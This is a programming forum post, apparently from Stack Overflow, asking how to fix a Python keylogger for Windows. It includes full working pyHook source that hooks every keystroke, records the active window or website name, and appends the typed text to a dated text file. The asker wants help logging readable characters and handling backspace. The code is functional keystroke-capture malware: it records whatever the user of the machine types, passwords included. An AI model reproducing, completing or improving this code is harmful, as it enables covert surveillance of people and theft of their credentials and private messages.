# How do I get the keylogger on my PC to print charcters to a txt file

Tags: python, python-3.x, windows

I can't get my local machine keylogger to print outputs. It prints the open app/website but the best I could get for letters is their ascii equivalent.

```
import pyHook, pythoncom
from datetime import datetime

todays_date = datetime.now().strftime('%Y-%b-%d')
file_name = todays_date + '.txt'

line_buffer = ""
window_name = ""

def SaveLineToFile(line):
    todays_file = open(file_name, 'a')
    todays_file.write(line)
    todays_file.close()

def OnKeyboardEvent(event):
    global line_buffer
    global window_name


    if(window_name != event.WindowName):
        if(line_buffer != ""):
            line_buffer += '\n'
            SaveLineToFile(line_buffer)

        line_buffer = ""
        SaveLineToFile('\n-----WindowName: ' + event.WindowName + '\n')
        window_name = event.WindowName

    if(event.Ascii == 13 or event.Ascii == 9):
        line_buffer += '\n'
        SaveLineToFile(line_buffer)
        line_buffer = ""
        return True

    if(event.Ascii == 8):
        line_buffer = line_buffer[:-1]
        return True

    if(event.Ascii < 32 or event.Ascii > 126):
        if(event.Ascii == 0):
            pass
        else:
            line_buffer = line_buffer + '\n' + str(event.Ascii) + '\n'
    else:
        line_buffer += chr(event.Ascii)

    return True

SaveLineToFile(line_buffer)
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

I want it to print keystrokes to the file when they happen and delete keystrokes when the backspace key is used as well as print out the app/website in which this happened.